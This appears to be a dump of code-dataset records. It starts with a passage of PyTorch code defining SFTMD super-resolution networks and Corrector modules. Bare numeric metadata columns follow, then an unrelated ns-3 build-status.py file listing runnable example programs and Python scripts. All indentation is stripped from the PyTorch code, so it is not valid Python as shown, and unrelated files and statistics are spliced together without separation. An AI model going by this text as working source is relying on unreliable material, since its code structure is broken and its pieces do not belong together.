kernel_code = kernel_code.view((Bk, Ck, 1, 1)).expand((Bk, Ck, H, W))
fea = self.lrelu(self.conv_first(input))
fea_sft = fea.clone()
for i in range(self.n_RB):
fea_sft = self.__getattr__('SFTRB' + str(i))(fea_sft, kernel_code)
fea = fea + fea_sft
fea = self.conv_extra(self.lrelu(self.sft_extra(fea, kernel_code)))
fea = self.dropout(fea)
fea = self.conv_extra2(fea)
out = self.conv_final(self.upscale(fea))
return out
class SFTMD_SN_ReLU(nn.Module):
def __init__(self, inc=3, nf=64, n_condition=10, scale=4, n_RB=16):
super(SFTMD_SN_ReLU, self).__init__()
self.n_RB = n_RB
n_power_iterations = 1
self.conv_first = spectral_norm(nn.Conv2d(inc, nf, 3, stride=1, padding=1), name='weight',
n_power_iterations=n_power_iterations)
for i in range(n_RB):
self.add_module('SFTRB' + str(i),
SFTResidualBlock_SN_ReLU(nf=nf, n_condition=n_condition))
self.sft_extra = SFTLayer_SN_ReLU(nf=nf, n_condition=n_condition)
self.conv_extra = spectral_norm(
nn.Conv2d(nf, nf, kernel_size=3, stride=1, padding=1, bias=True), name='weight',
n_power_iterations=n_power_iterations)
if scale == 4:
self.upscale = nn.Sequential(
spectral_norm(
nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1, bias=True),
name='weight', n_power_iterations=n_power_iterations),
nn.PixelShuffle(scale // 2),
nn.ReLU(inplace=True),
spectral_norm(
nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1, bias=True),
name='weight', n_power_iterations=n_power_iterations),
nn.PixelShuffle(scale // 2),
nn.ReLU(inplace=True),
)
else:
self.upscale = nn.Sequential(
spectral_norm(
nn.Conv2d(nf, nf * scale**2, kernel_size=3, stride=1, padding=1, bias=True),
name='weight', n_power_iterations=n_power_iterations),
nn.PixelShuffle(scale),
nn.ReLU(inplace=True),
)
self.conv_final = spectral_norm(
nn.Conv2d(nf, inc, kernel_size=3, stride=1, padding=1, bias=True), name='weight',
n_power_iterations=n_power_iterations)
self.relu = nn.ReLU(inplace=True)
def forward(self, input, kernel_code):
_, _, H, W = input.size()
Bk, Ck = kernel_code.size()
kernel_code = kernel_code.view((Bk, Ck, 1, 1)).expand((Bk, Ck, H, W))
fea = self.relu(self.conv_first(input))
fea_sft = fea.clone()
for i in range(self.n_RB):
fea_sft = self.__getattr__('SFTRB' + str(i))(fea_sft, kernel_code)
fea = fea + fea_sft
fea = self.conv_extra(self.relu(self.sft_extra(fea, kernel_code)))
out = self.conv_final(self.upscale(fea))
return out
class SFTMD_concat(nn.Module):
def __init__(self, inc=3, nf=64, n_condition=10, scale=4, n_RB=16):
super(SFTMD_concat, self).__init__()
self.n_RB = n_RB
self.conv_first = nn.Conv2d(n_condition + 3, nf, 3, stride=1, padding=1)
for i in range(n_RB):
self.add_module('SFTRB' + str(i), arch_util.ResidualBlock_noBN(nf=nf))
self.conv_extra = nn.Conv2d(nf, nf, kernel_size=3, stride=1, padding=1, bias=True)
if scale == 4:
self.upscale = nn.Sequential(
nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1, bias=True),
nn.PixelShuffle(scale // 2),
nn.LeakyReLU(0.1, inplace=True),
nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1, bias=True),
nn.PixelShuffle(scale // 2),
nn.LeakyReLU(0.1, inplace=True),
)
else:
self.upscale = nn.Sequential(
nn.Conv2d(nf, nf * scale**2, kernel_size=3, stride=1, padding=1, bias=True),
nn.PixelShuffle(scale),
nn.LeakyReLU(0.1, inplace=True),
)
self.conv_final = nn.Conv2d(nf, inc, kernel_size=3, stride=1, padding=1, bias=True)
self.lrelu = nn.LeakyReLU(negative_slope=0.1, inplace=True)
def forward(self, input, kernel_code):
B, _, H, W = input.size()
Bk, Ck = kernel_code.size()
kernel_code = kernel_code.view((Bk, Ck, 1, 1)).expand((Bk, Ck, H, W))
fea = self.lrelu(self.conv_first(torch.cat((input, kernel_code), 1)))
fea_sft = fea.clone()
for i in range(self.n_RB):
fea_sft = self.__getattr__('SFTRB' + str(i))(fea_sft)
fea = fea + fea_sft
fea = self.conv_extra(self.lrelu(fea))
out = self.conv_final(self.upscale(fea))
return out
class SFTMD_kernel(nn.Module):
def __init__(self, inc=3, nf=64, n_condition=10, scale=4, n_RB=16, k=11):
super(SFTMD_kernel, self).__init__()
self.n_RB = n_RB
self.fc_share_1 = nn.Linear(32, 100)
self.fc_share_2 = nn.Linear(100, 200)
self.fc_share_3 = nn.Linear(200, 400)
self.fc_share_4 = nn.Linear(400, 200)
self.fc_share_conv1_1 = nn.Linear(200, 200)
self.fc_share_conv1_2 = nn.Linear(200, 10 * 3 * k * 1)
self.fc_share_conv2_1 = nn.Linear(200, 200)
self.fc_share_conv2_2 = nn.Linear(200, 10 * 10 * k * 1)
self.conv_first = nn.Conv2d(10, nf, 3, stride=1, padding=1)
for i in range(n_RB):
self.add_module('SFTRB' + str(i), arch_util.ResidualBlock_noBN(nf=nf))
self.conv_extra = nn.Conv2d(nf, nf, kernel_size=3, stride=1, padding=1, bias=True)
if scale == 4:
self.upscale = nn.Sequential(
nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1, bias=True),
nn.PixelShuffle(scale // 2),
nn.LeakyReLU(0.1, inplace=True),
nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1, bias=True),
nn.PixelShuffle(scale // 2),
nn.LeakyReLU(0.1, inplace=True),
)
else:
self.upscale = nn.Sequential(
nn.Conv2d(nf, nf * scale**2, kernel_size=3, stride=1, padding=1, bias=True),
nn.PixelShuffle(scale),
nn.LeakyReLU(0.1, inplace=True),
)
self.conv_final = nn.Conv2d(nf, inc, kernel_size=3, stride=1, padding=1, bias=True)
self.lrelu = nn.LeakyReLU(negative_slope=0.1, inplace=True)
self.pad = (k - 1) // 2
self.k = k
def forward(self, input, kernel_code):
B, _, H, W = input.size()
# generate conv code
kernel_code = kernel_code.view((B, -1))
kernel_code = self.lrelu(self.fc_share_1(kernel_code))
kernel_code = self.lrelu(self.fc_share_2(kernel_code))
kernel_code = self.lrelu(self.fc_share_3(kernel_code))
kernel_code = self.lrelu(self.fc_share_4(kernel_code))
conv1_weight = self.fc_share_conv1_2(self.lrelu(self.fc_share_conv1_1(kernel_code)))
conv2_weight = self.fc_share_conv2_2(self.lrelu(self.fc_share_conv2_1(kernel_code)))
conv1_weight = conv1_weight.view((10, 3, self.k, 1))
conv2_weight = conv2_weight.view((10, 10, 1, self.k))
fea = self.lrelu(F.conv2d(input, conv1_weight, padding=(self.pad, 0)))
fea = self.lrelu(F.conv2d(fea, conv2_weight, padding=(0, self.pad)))
fea = self.lrelu(self.conv_first(fea))
fea_sft = fea.clone()
for i in range(self.n_RB):
fea_sft = self.__getattr__('SFTRB' + str(i))(fea_sft)
fea = fea + fea_sft
fea = self.conv_extra(self.lrelu(fea))
out = self.conv_final(self.upscale(fea))
return out
class SFTMD_coderefine(nn.Module):
def __init__(self, inc=3, nf=64, n_condition=10, scale=4, n_RB=16):
super(SFTMD_coderefine, self).__init__()
self.n_RB = n_RB
self.conv_first = nn.Conv2d(inc, nf, 3, stride=1, padding=1)
for i in range(n_RB):
self.add_module('SFTRB' + str(i), SFTResidualBlock(nf=nf, n_condition=n_condition))
self.sft_extra = SFTLayer(nf=nf, n_condition=n_condition)
self.conv_extra = nn.Conv2d(nf, nf, kernel_size=3, stride=1, padding=1, bias=True)
if scale == 4:
self.upscale = nn.Sequential(
nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1, bias=True),
nn.PixelShuffle(scale // 2),
nn.LeakyReLU(0.1, inplace=True),
nn.Conv2d(nf, nf * scale, kernel_size=3, stride=1, padding=1, bias=True),
nn.PixelShuffle(scale // 2),
nn.LeakyReLU(0.1, inplace=True),
)
else:
self.upscale = nn.Sequential(
nn.Conv2d(nf, nf * scale**2, kernel_size=3, stride=1, padding=1, bias=True),
nn.PixelShuffle(scale),
nn.LeakyReLU(0.1, inplace=True),
)
self.conv_final = nn.Conv2d(nf, inc, kernel_size=3, stride=1, padding=1, bias=True)
self.lrelu = nn.LeakyReLU(negative_slope=0.1, inplace=True)
self.fc1 = nn.Linear(n_condition, 400)
self.fc2 = nn.Linear(400, 400)
self.fc3 = nn.Linear(400, 200)
self.fc4 = nn.Linear(200, n_condition)
def forward(self, input, kernel_code):
_, _, H, W = input.size()
kernel_code = self.lrelu(self.fc1(kernel_code))
kernel_code = self.lrelu(self.fc2(kernel_code))
kernel_code = self.lrelu(self.fc3(kernel_code))
kernel_code = self.fc4(kernel_code)
Bk, Ck = kernel_code.size()
kernel_code = kernel_code.view((Bk, Ck, 1, 1)).expand((Bk, Ck, H, W))
fea = self.lrelu(self.conv_first(input))
fea_sft = fea.clone()
for i in range(self.n_RB):
fea_sft = self.__getattr__('SFTRB' + str(i))(fea_sft, kernel_code)
fea = fea + fea_sft
fea = self.conv_extra(self.lrelu(self.sft_extra(fea, kernel_code)))
out = self.conv_final(self.upscale(fea))
return out
class Corrector(nn.Module):
def __init__(self, inc=3, n_condition=10, nf=64, conv_merge=True, use_bias=True):
super(Corrector, self).__init__()
self.ConvNet = nn.Sequential(*[
nn.Conv2d(inc, nf, kernel_size=5, stride=1, padding=2, bias=use_bias),
nn.LeakyReLU(0.1, True),
nn.Conv2d(nf, nf, kernel_size=5, stride=2, padding=2, bias=use_bias),
nn.LeakyReLU(0.1, True),
nn.Conv2d(nf, nf, kernel_size=5, stride=1, padding=2, bias=use_bias),
nn.LeakyReLU(0.1, True),
nn.Conv2d(nf, nf, kernel_size=5, stride=2, padding=2, bias=use_bias),
nn.LeakyReLU(0.1, True),
nn.Conv2d(nf, nf, kernel_size=5, stride=1, padding=2, bias=use_bias),
nn.LeakyReLU(0.1, True),
nn.Conv2d(nf, nf, kernel_size=5, stride=1, padding=2, bias=use_bias),
nn.LeakyReLU(0.1, True),
nn.Conv2d(nf, nf, kernel_size=5, stride=1, padding=2, bias=use_bias),
nn.LeakyReLU(0.1, True),
])
self.code_dense = nn.Sequential(*[
nn.Linear(n_condition, nf, bias=use_bias),
nn.LeakyReLU(0.1, True),
nn.Linear(nf, nf, bias=use_bias),
])
if conv_merge:
self.global_dense = nn.Sequential(*[
nn.Conv2d(nf * 2, nf * 2, kernel_size=1, stride=1, padding=0, bias=use_bias),
nn.LeakyReLU(0.1, True),
nn.Conv2d(nf * 2, nf, kernel_size=1, stride=1, padding=0, bias=use_bias),
nn.LeakyReLU(0.1, True),
nn.Conv2d(nf, nf, kernel_size=1, stride=1, padding=0, bias=use_bias),
nn.LeakyReLU(0.1, True),
])
self.nf = nf
self.conv_merge = conv_merge
self.fc1 = nn.Linear(nf, nf, bias=True)
self.fc2 = nn.Linear(nf, nf, bias=True)
self.fc3 = nn.Linear(nf, n_condition, bias=True)
self.globalpooling = nn.AdaptiveAvgPool2d((1, 1))
self.lrelu = nn.LeakyReLU(0.1, True)
def forward(self, input, code):
conv_input = self.ConvNet(input)
B, C_f, H_f, W_f = conv_input.size() # LR_size
code_ori = self.code_dense(code)
if self.conv_merge:
conv_code = code_ori.view((B, self.nf, 1, 1)).expand((B, self.nf, H_f, W_f))
conv_mid = torch.cat((conv_input, conv_code), dim=1)
conv_input = self.global_dense(conv_mid)
fea = self.globalpooling(conv_input).view(conv_input.size(0), -1)
fea = self.lrelu(self.fc1(fea))
fea = self.lrelu(self.fc2(fea))
out = self.fc3(fea)
return out + code
class CorrectorV2(nn.Module):
def __init__(self, inc=3, n_condition=10, nf=64, conv_merge=False, use_bias=True):
super(CorrectorV2, self).__init__()
self.ConvNet = nn.Sequential(*[
nn.Conv2d(inc, nf, kernel_size=5, stride=1, padding=2, bias=use_bias),
nn.LeakyReLU(0.1, True),
nn.Conv2d(nf, nf, kernel_size=5, stride=2, padding=2, bias=use_bias),
nn.LeakyReLU(0.1, True),
nn.Conv2d(nf, nf, kernel_size=5, stride=1, padding=2, bias=use_bias),
nn.LeakyReLU(0.1, True),
nn.Conv2d(nf, nf, kernel_size=5, stride=2, padding=2, bias=use_bias),
nn.LeakyReLU(0.1, True),
nn.Conv2d(nf, nf, kernel_size=5, stride=1, padding=2, bias=use_bias),
nn.LeakyReLU(0.1, True),
nn.Conv2d(nf, nf, kernel_size=5, stride=1, padding=2, bias=use_bias),
nn.LeakyReLU(0.1, True),
nn.Conv2d(nf, nf, kernel_size=5, stride=1, padding=2, bias=use_bias),
nn.LeakyReLU(0.1, True),
])
self.code_dense = nn.Sequential(*[
nn.Linear(n_condition, nf, bias=use_bias),
nn.LeakyReLU(0.1, True),
nn.Linear(nf, nf, bias=use_bias),
])
if conv_merge:
self.global_dense = nn.Sequential(*[
nn.Conv2d(nf * 2, nf * 2, kernel_size=1, stride=1, padding=0, bias=use_bias),
nn.LeakyReLU(0.1, True),
nn.Conv2d(nf * 2, nf, kernel_size=1, stride=1, padding=0, bias=use_bias),
nn.LeakyReLU(0.1, True),
nn.Conv2d(nf, nf, kernel_size=1, stride=1, padding=0, bias=use_bias),
nn.LeakyReLU(0.1, True),
])
self.nf = nf
self.conv_merge = conv_merge
self.fc1 = nn.Linear(nf, nf, bias=True)
self.fc2 = nn.Linear(nf, nf, bias=True)
self.fc3 = nn.Linear(nf, n_condition, bias=True)
self.globalpooling = nn.AdaptiveAvgPool2d((1, 1))
self.lrelu = nn.LeakyReLU(0.1, True)
def forward(self, input, code):
conv_input = self.ConvNet(input)
B, C_f, H_f, W_f = conv_input.size() # LR_size
code_ori = self.code_dense(code)
if self.conv_merge:
conv_code = code_ori.view((B, self.nf, 1, 1)).expand((B, self.nf, H_f, W_f))
conv_mid = torch.cat((conv_input, conv_code), dim=1)
conv_input = self.global_dense(conv_mid)
fea = self.globalpooling(conv_input).view(conv_input.size(0), -1)
fea = self.lrelu(self.fc1(fea))
fea = self.lrelu(self.fc2(fea))
out = self.fc3(fea)
return out + code_ori
| 45.251845
| 110
| 0.572687
| 6,549
| 49,053
| 4.063674
| 0.028859
| 0.036073
| 0.096194
| 0.052418
| 0.942622
| 0.92793
| 0.917071
| 0.900876
| 0.893999
| 0.881975
| 0
| 0.034697
| 0.306097
| 49,053
| 1,083
| 111
| 45.293629
| 0.747165
| 0.009948
| 0
| 0.797553
| 0
| 0
| 0.011639
| 0
| 0
| 0
| 0
| 0.000923
| 0
| 1
| 0.044494
| false
| 0
| 0.006674
| 0
| 0.101224
| 0.002225
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ff9f8f871223cbf21633f777d013d3d15bbc6700
| 66
|
py
|
Python
|
run/__init__.py
|
ealcobaca/optimizer_pool
|
e93ac72c1547bc3813a0edf822d5fd453f22ce49
|
[
"MIT"
] | 1
|
2022-03-10T21:46:07.000Z
|
2022-03-10T21:46:07.000Z
|
run/__init__.py
|
ealcobaca/optimizer_pool
|
e93ac72c1547bc3813a0edf822d5fd453f22ce49
|
[
"MIT"
] | null | null | null |
run/__init__.py
|
ealcobaca/optimizer_pool
|
e93ac72c1547bc3813a0edf822d5fd453f22ce49
|
[
"MIT"
] | 1
|
2022-03-10T21:46:09.000Z
|
2022-03-10T21:46:09.000Z
|
from run.run_real import Run_real
from run.run_PSO import Run_PSO
| 22
| 33
| 0.848485
| 14
| 66
| 3.714286
| 0.357143
| 0.269231
| 0.384615
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.121212
| 66
| 2
| 34
| 33
| 0.896552
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
441cc1fcbf285eb769a00c3f77129f03547305f0
| 12,718
|
py
|
Python
|
ns-allinone-3.27/ns-3.27/build/build-status.py
|
zack-braun/4607_NS
|
43c8fb772e5552fb44bd7cd34173e73e3fb66537
|
[
"MIT"
] | null | null | null |
ns-allinone-3.27/ns-3.27/build/build-status.py
|
zack-braun/4607_NS
|
43c8fb772e5552fb44bd7cd34173e73e3fb66537
|
[
"MIT"
] | null | null | null |
ns-allinone-3.27/ns-3.27/build/build-status.py
|
zack-braun/4607_NS
|
43c8fb772e5552fb44bd7cd34173e73e3fb66537
|
[
"MIT"
] | null | null | null |
#! /usr/bin/env python
# Programs that are runnable.
ns3_runnable_programs = ['build/src/aodv/examples/ns3.27-aodv-debug', 'build/src/bridge/examples/ns3.27-csma-bridge-debug', 'build/src/bridge/examples/ns3.27-csma-bridge-one-hop-debug', 'build/src/buildings/examples/ns3.27-buildings-pathloss-profiler-debug', 'build/src/config-store/examples/ns3.27-config-store-save-debug', 'build/src/core/examples/ns3.27-main-callback-debug', 'build/src/core/examples/ns3.27-sample-simulator-debug', 'build/src/core/examples/ns3.27-main-ptr-debug', 'build/src/core/examples/ns3.27-main-random-variable-debug', 'build/src/core/examples/ns3.27-main-random-variable-stream-debug', 'build/src/core/examples/ns3.27-sample-random-variable-debug', 'build/src/core/examples/ns3.27-sample-random-variable-stream-debug', 'build/src/core/examples/ns3.27-command-line-example-debug', 'build/src/core/examples/ns3.27-hash-example-debug', 'build/src/core/examples/ns3.27-sample-log-time-format-debug', 'build/src/core/examples/ns3.27-test-string-value-formatting-debug', 'build/src/csma/examples/ns3.27-csma-one-subnet-debug', 'build/src/csma/examples/ns3.27-csma-broadcast-debug', 'build/src/csma/examples/ns3.27-csma-packet-socket-debug', 'build/src/csma/examples/ns3.27-csma-multicast-debug', 'build/src/csma/examples/ns3.27-csma-raw-ip-socket-debug', 'build/src/csma/examples/ns3.27-csma-ping-debug', 'build/src/csma-layout/examples/ns3.27-csma-star-debug', 'build/src/dsdv/examples/ns3.27-dsdv-manet-debug', 'build/src/dsr/examples/ns3.27-dsr-debug', 'build/src/energy/examples/ns3.27-li-ion-energy-source-debug', 'build/src/energy/examples/ns3.27-rv-battery-model-test-debug', 'build/src/energy/examples/ns3.27-basic-energy-model-test-debug', 'build/src/fd-net-device/examples/ns3.27-dummy-network-debug', 'build/src/fd-net-device/examples/ns3.27-fd2fd-onoff-debug', 'build/src/internet/examples/ns3.27-main-simple-debug', 'build/src/internet-apps/examples/ns3.27-dhcp-example-debug', 'build/src/lr-wpan/examples/ns3.27-lr-wpan-packet-print-debug', 'build/src/lr-wpan/examples/ns3.27-lr-wpan-phy-test-debug', 'build/src/lr-wpan/examples/ns3.27-lr-wpan-data-debug', 'build/src/lr-wpan/examples/ns3.27-lr-wpan-error-model-plot-debug', 'build/src/lr-wpan/examples/ns3.27-lr-wpan-error-distance-plot-debug', 'build/src/lte/examples/ns3.27-lena-cqi-threshold-debug', 'build/src/lte/examples/ns3.27-lena-dual-stripe-debug', 'build/src/lte/examples/ns3.27-lena-fading-debug', 'build/src/lte/examples/ns3.27-lena-intercell-interference-debug', 'build/src/lte/examples/ns3.27-lena-pathloss-traces-debug', 'build/src/lte/examples/ns3.27-lena-profiling-debug', 'build/src/lte/examples/ns3.27-lena-rem-debug', 'build/src/lte/examples/ns3.27-lena-rem-sector-antenna-debug', 'build/src/lte/examples/ns3.27-lena-rlc-traces-debug', 'build/src/lte/examples/ns3.27-lena-simple-debug', 'build/src/lte/examples/ns3.27-lena-simple-epc-debug', 'build/src/lte/examples/ns3.27-lena-deactivate-bearer-debug', 'build/src/lte/examples/ns3.27-lena-x2-handover-debug', 'build/src/lte/examples/ns3.27-lena-x2-handover-measures-debug', 'build/src/lte/examples/ns3.27-lena-frequency-reuse-debug', 'build/src/lte/examples/ns3.27-lena-distributed-ffr-debug', 'build/src/lte/examples/ns3.27-lena-uplink-power-control-debug', 'build/src/mesh/examples/ns3.27-mesh-debug', 'build/src/mobility/examples/ns3.27-main-grid-topology-debug', 'build/src/mobility/examples/ns3.27-main-random-topology-debug', 'build/src/mobility/examples/ns3.27-main-random-walk-debug', 'build/src/mobility/examples/ns3.27-mobility-trace-example-debug', 'build/src/mobility/examples/ns3.27-ns2-mobility-trace-debug', 'build/src/mobility/examples/ns3.27-bonnmotion-ns2-example-debug', 'build/src/mpi/examples/ns3.27-simple-distributed-debug', 'build/src/mpi/examples/ns3.27-third-distributed-debug', 'build/src/mpi/examples/ns3.27-nms-p2p-nix-distributed-debug', 'build/src/mpi/examples/ns3.27-simple-distributed-empty-node-debug', 'build/src/netanim/examples/ns3.27-dumbbell-animation-debug', 'build/src/netanim/examples/ns3.27-grid-animation-debug', 'build/src/netanim/examples/ns3.27-star-animation-debug', 'build/src/netanim/examples/ns3.27-wireless-animation-debug', 'build/src/netanim/examples/ns3.27-uan-animation-debug', 'build/src/netanim/examples/ns3.27-colors-link-description-debug', 'build/src/netanim/examples/ns3.27-resources-counters-debug', 'build/src/network/examples/ns3.27-main-packet-header-debug', 'build/src/network/examples/ns3.27-main-packet-tag-debug', 'build/src/network/examples/ns3.27-packet-socket-apps-debug', 'build/src/nix-vector-routing/examples/ns3.27-nix-simple-debug', 'build/src/nix-vector-routing/examples/ns3.27-nms-p2p-nix-debug', 'build/src/olsr/examples/ns3.27-simple-point-to-point-olsr-debug', 'build/src/olsr/examples/ns3.27-olsr-hna-debug', 'build/src/point-to-point/examples/ns3.27-main-attribute-value-debug', 'build/src/propagation/examples/ns3.27-main-propagation-loss-debug', 'build/src/propagation/examples/ns3.27-jakes-propagation-model-example-debug', 'build/src/sixlowpan/examples/ns3.27-example-sixlowpan-debug', 'build/src/sixlowpan/examples/ns3.27-example-ping-lr-wpan-debug', 'build/src/spectrum/examples/ns3.27-adhoc-aloha-ideal-phy-debug', 'build/src/spectrum/examples/ns3.27-adhoc-aloha-ideal-phy-matrix-propagation-loss-model-debug', 'build/src/spectrum/examples/ns3.27-adhoc-aloha-ideal-phy-with-microwave-oven-debug', 'build/src/spectrum/examples/ns3.27-tv-trans-example-debug', 'build/src/spectrum/examples/ns3.27-tv-trans-regional-example-debug', 'build/src/stats/examples/ns3.27-gnuplot-example-debug', 'build/src/stats/examples/ns3.27-double-probe-example-debug', 'build/src/stats/examples/ns3.27-time-probe-example-debug', 'build/src/stats/examples/ns3.27-gnuplot-aggregator-example-debug', 'build/src/stats/examples/ns3.27-gnuplot-helper-example-debug', 'build/src/stats/examples/ns3.27-file-aggregator-example-debug', 'build/src/stats/examples/ns3.27-file-helper-example-debug', 'build/src/topology-read/examples/ns3.27-topology-example-sim-debug', 'build/src/traffic-control/examples/ns3.27-red-tests-debug', 'build/src/traffic-control/examples/ns3.27-red-vs-ared-debug', 'build/src/traffic-control/examples/ns3.27-adaptive-red-tests-debug', 'build/src/traffic-control/examples/ns3.27-pfifo-vs-red-debug', 'build/src/traffic-control/examples/ns3.27-codel-vs-pfifo-basic-test-debug', 'build/src/traffic-control/examples/ns3.27-codel-vs-pfifo-asymmetric-debug', 'build/src/traffic-control/examples/ns3.27-pie-example-debug', 'build/src/uan/examples/ns3.27-uan-cw-example-debug', 'build/src/uan/examples/ns3.27-uan-rc-example-debug', 'build/src/virtual-net-device/examples/ns3.27-virtual-net-device-debug', 'build/src/wave/examples/ns3.27-wave-simple-80211p-debug', 'build/src/wave/examples/ns3.27-wave-simple-device-debug', 'build/src/wave/examples/ns3.27-vanet-routing-compare-debug', 'build/src/wifi/examples/ns3.27-wifi-phy-test-debug', 'build/src/wifi/examples/ns3.27-test-interference-helper-debug', 'build/src/wifi/examples/ns3.27-wifi-manager-example-debug', 'build/src/wimax/examples/ns3.27-wimax-ipv4-debug', 'build/src/wimax/examples/ns3.27-wimax-multicast-debug', 'build/src/wimax/examples/ns3.27-wimax-simple-debug', 'build/examples/energy/ns3.27-energy-model-example-debug', 'build/examples/energy/ns3.27-energy-model-with-harvesting-example-debug', 'build/examples/error-model/ns3.27-simple-error-model-debug', 'build/examples/ipv6/ns3.27-icmpv6-redirect-debug', 'build/examples/ipv6/ns3.27-ping6-debug', 'build/examples/ipv6/ns3.27-radvd-debug', 'build/examples/ipv6/ns3.27-radvd-two-prefix-debug', 'build/examples/ipv6/ns3.27-test-ipv6-debug', 'build/examples/ipv6/ns3.27-fragmentation-ipv6-debug', 'build/examples/ipv6/ns3.27-fragmentation-ipv6-two-MTU-debug', 'build/examples/ipv6/ns3.27-loose-routing-ipv6-debug', 'build/examples/ipv6/ns3.27-wsn-ping6-debug', 'build/examples/matrix-topology/ns3.27-matrix-topology-debug', 'build/examples/naming/ns3.27-object-names-debug', 'build/examples/routing/ns3.27-dynamic-global-routing-debug', 'build/examples/routing/ns3.27-static-routing-slash32-debug', 'build/examples/routing/ns3.27-global-routing-slash32-debug', 'build/examples/routing/ns3.27-global-injection-slash32-debug', 'build/examples/routing/ns3.27-simple-global-routing-debug', 'build/examples/routing/ns3.27-simple-alternate-routing-debug', 'build/examples/routing/ns3.27-mixed-global-routing-debug', 'build/examples/routing/ns3.27-simple-routing-ping6-debug', 'build/examples/routing/ns3.27-manet-routing-compare-debug', 'build/examples/routing/ns3.27-ripng-simple-network-debug', 'build/examples/routing/ns3.27-rip-simple-network-debug', 'build/examples/routing/ns3.27-global-routing-multi-switch-plus-router-debug', 'build/examples/socket/ns3.27-socket-bound-static-routing-debug', 'build/examples/socket/ns3.27-socket-bound-tcp-static-routing-debug', 'build/examples/socket/ns3.27-socket-options-ipv4-debug', 'build/examples/socket/ns3.27-socket-options-ipv6-debug', 'build/examples/stats/ns3.27-wifi-example-sim-debug', 'build/examples/tcp/ns3.27-tcp-large-transfer-debug', 'build/examples/tcp/ns3.27-tcp-nsc-lfn-debug', 'build/examples/tcp/ns3.27-tcp-nsc-zoo-debug', 'build/examples/tcp/ns3.27-tcp-star-server-debug', 'build/examples/tcp/ns3.27-star-debug', 'build/examples/tcp/ns3.27-tcp-bulk-send-debug', 'build/examples/tcp/ns3.27-tcp-pcap-nanosec-example-debug', 'build/examples/tcp/ns3.27-tcp-nsc-comparison-debug', 'build/examples/tcp/ns3.27-tcp-variants-comparison-debug', 'build/examples/traffic-control/ns3.27-traffic-control-debug', 'build/examples/traffic-control/ns3.27-queue-discs-benchmark-debug', 'build/examples/traffic-control/ns3.27-red-vs-fengadaptive-debug', 'build/examples/traffic-control/ns3.27-red-vs-nlred-debug', 'build/examples/tutorial/ns3.27-hello-simulator-debug', 'build/examples/tutorial/ns3.27-first-debug', 'build/examples/tutorial/ns3.27-second-debug', 'build/examples/tutorial/ns3.27-third-debug', 'build/examples/tutorial/ns3.27-fourth-debug', 'build/examples/tutorial/ns3.27-fifth-debug', 'build/examples/tutorial/ns3.27-sixth-debug', 'build/examples/tutorial/ns3.27-seventh-debug', 'build/examples/udp/ns3.27-udp-echo-debug', 'build/examples/udp-client-server/ns3.27-udp-client-server-debug', 'build/examples/udp-client-server/ns3.27-udp-trace-client-server-debug', 'build/examples/wireless/ns3.27-mixed-wired-wireless-debug', 'build/examples/wireless/ns3.27-wifi-adhoc-debug', 'build/examples/wireless/ns3.27-wifi-clear-channel-cmu-debug', 'build/examples/wireless/ns3.27-wifi-ap-debug', 'build/examples/wireless/ns3.27-wifi-wired-bridging-debug', 'build/examples/wireless/ns3.27-multirate-debug', 'build/examples/wireless/ns3.27-wifi-simple-adhoc-debug', 'build/examples/wireless/ns3.27-wifi-simple-adhoc-grid-debug', 'build/examples/wireless/ns3.27-wifi-simple-infra-debug', 'build/examples/wireless/ns3.27-wifi-simple-interference-debug', 'build/examples/wireless/ns3.27-wifi-blockack-debug', 'build/examples/wireless/ns3.27-ofdm-validation-debug', 'build/examples/wireless/ns3.27-ofdm-ht-validation-debug', 'build/examples/wireless/ns3.27-ofdm-vht-validation-debug', 'build/examples/wireless/ns3.27-wifi-hidden-terminal-debug', 'build/examples/wireless/ns3.27-ht-wifi-network-debug', 'build/examples/wireless/ns3.27-vht-wifi-network-debug', 'build/examples/wireless/ns3.27-wifi-timing-attributes-debug', 'build/examples/wireless/ns3.27-wifi-sleep-debug', 'build/examples/wireless/ns3.27-power-adaptation-distance-debug', 'build/examples/wireless/ns3.27-power-adaptation-interference-debug', 'build/examples/wireless/ns3.27-rate-adaptation-distance-debug', 'build/examples/wireless/ns3.27-wifi-aggregation-debug', 'build/examples/wireless/ns3.27-simple-ht-hidden-stations-debug', 'build/examples/wireless/ns3.27-80211n-mimo-debug', 'build/examples/wireless/ns3.27-mixed-network-debug', 'build/examples/wireless/ns3.27-wifi-tcp-debug', 'build/examples/wireless/ns3.27-80211e-txop-debug', 'build/examples/wireless/ns3.27-wifi-spectrum-per-example-debug', 'build/examples/wireless/ns3.27-wifi-spectrum-per-interference-debug', 'build/examples/wireless/ns3.27-wifi-spectrum-saturation-example-debug', 'build/examples/wireless/ns3.27-ofdm-he-validation-debug', 'build/examples/wireless/ns3.27-he-wifi-network-debug', 'build/examples/wireless/ns3.27-wifi-multi-tos-debug', 'build/examples/wireless/ns3.27-wifi-backward-compatibility-debug', 'build/scratch/ns3.27-scratch-simulator-debug', 'build/scratch/subdir/ns3.27-subdir-debug']
# Scripts that are runnable.
ns3_runnable_scripts = ['csma-bridge.py', 'sample-simulator.py', 'wifi-olsr-flowmon.py', 'simple-routing-ping6.py', 'first.py', 'second.py', 'third.py', 'mixed-wired-wireless.py', 'wifi-ap.py']
| 1,413.111111
| 12,438
| 0.787231
| 2,040
| 12,718
| 4.905882
| 0.141176
| 0.103917
